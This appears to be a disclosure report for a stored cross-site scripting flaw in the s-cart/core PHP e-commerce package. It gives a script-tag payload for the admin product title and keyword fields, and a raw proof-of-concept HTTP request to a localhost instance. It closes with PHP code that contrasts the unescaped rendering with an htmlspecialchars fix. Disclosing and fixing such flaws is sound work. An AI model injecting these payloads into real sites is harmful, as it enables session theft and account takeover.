s-cart/core

Vulnerability: Cross-site scripting (XSS)
Severity: 6.6
Language: PHP
Registry: Packagist

✍️ Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

🕵️‍♂️ Proof of Concept

1. `git clone https://github.com/s-cart/s-cart` and `composer install`
2. Log in as admin and add a product.
3. Add the XSS payload `"><script>alert("test")</script>` as the Product title or as the Keyword, as both are vulnerable.
4. Click on send and the popup appears.

## POC request:
```http
POST /s-cart/public/sc_admin/product/create HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------391325859225283787311340371998
Content-Length: 3823
Origin: http://localhost:8000
Connection: keep-alive
Referer: http://localhost:8000/s-cart/public/sc_admin/product/create
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; curSection_options=%22meta-polja%22; localhost-cms-admin-files1=%7B%220%22%3A0%7D; BLUDIT-KEY=r7oq4j0i11ldvm76u09r82mfdo; online_inovicing_system=r0e1337b4kup6v48o6t3qal0s7; cat_session_id=1sfltmkpoq80mv9hqhti0d8oug; XSRF-TOKEN=eyJpdiI6ImtXNlZMcDY4SmtOWVRGQUpqTFp1a2c9PSIsInZhbHVlIjoiTzA3cGZNemViTWcra2FPSitqaFVXeE9OWHdvZW42Wk1ML3hpbE1uRTVPcit2M2FaMzBWK3ZORkxaRStNbDFQSWdBNnlVanhFdm1kMlRzSHN3SlEydDJRMHYwcXJaV0wxTVJIUzhIcWJhcGpXVFE0c0RYWUw4cGRHQThBL1o3SW0iLCJtYWMiOiIxZmNhZjg1NjFjOTA4YmJiOWM2OTlmN2VmMDI4OTg1OTRkOWU4YzJhZDVhODk1YmQ3MGMwNTBiMjYzYWEyYmVhIn0%3D; scart_session=eyJpdiI6ImZhaXY5ZUFzenZuRTNoTUY5TmcvRFE9PSIsInZhbHVlIjoiVHB4M09id25mV0IzbFoyd1lKY3R3QWxzaHFnYlVRcldOeGpGMkRwc0YrM3Zuc1dIbDlmZWtpVElGZWc5Q21RckJuMFVMeHpQMTlNUGN0dlp0SkxNenY4OVlrbVJxSC9QS0FpTnBNMUsvTFI2L1d0UHRKSmFvdG9Gem1BNUtOYWUiLCJtYWMiOiIxYzViNmQ1MTU2OGJjNmQwNzBiMzM2YWUxY2M2NTdmZmE1ZjE0YTlkZDkzNDEwMmUyNGYzMzNlODQ4ZTYyOTM5In0%3D
Upgrade-Insecure-Requests: 1
```


💥 Impact

With XSS, an attacker can perform social engineering on users by redirecting them from the real website to a fake one. The attacker can steal their cookies, leading to account takeover, and download malware onto their system. There are many more attack scenarios a skilled attacker can carry out with XSS.
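
The fix for the report above is output encoding wherever the stored title or keyword is rendered. The PHP below is an added example, not S-Cart's own code: it assumes the value is echoed into an HTML attribute (which the `">` prefix of the payload suggests), and the function names and the `<input>` markup are hypothetical. It renders the report's payload both ways and parses the result to confirm whether a `<script>` element was created.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (hypothetical template): stored value concatenated as-is.
function renderTitleInputUnsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '">';
}

// Encode at output time for the HTML context. ENT_QUOTES encodes both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderTitleInputSafe(string $title): string
{
    return '<input type="text" name="title" value="' . encodeHtml($title) . '">';
}

// Parse the rendered fragment the way a browser would and report what it
// contains: the number of <script> elements and the input's decoded value.
function inspectFragment(string $html): array
{
    $previous = libxml_use_internal_errors(true); // silence parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'scripts' => $doc->getElementsByTagName('script')->length,
        'value'   => $input instanceof DOMElement ? $input->getAttribute('value') : null,
    ];
}

// Payload from the report's Proof of Concept.
$payload = '"><script>alert("test")</script>';

foreach (['unsafe' => 'renderTitleInputUnsafe', 'safe' => 'renderTitleInputSafe'] as $label => $render) {
    $result = inspectFragment($render($payload));
    printf("%-6s scripts=%d value_roundtrips=%s\n", $label, $result['scripts'],
        $result['value'] === $payload ? 'yes' : 'no');
}
```

If the view is a Laravel Blade template, `{{ $value }}` applies this same `htmlspecialchars` encoding, while `{!! $value !!}` outputs the value raw.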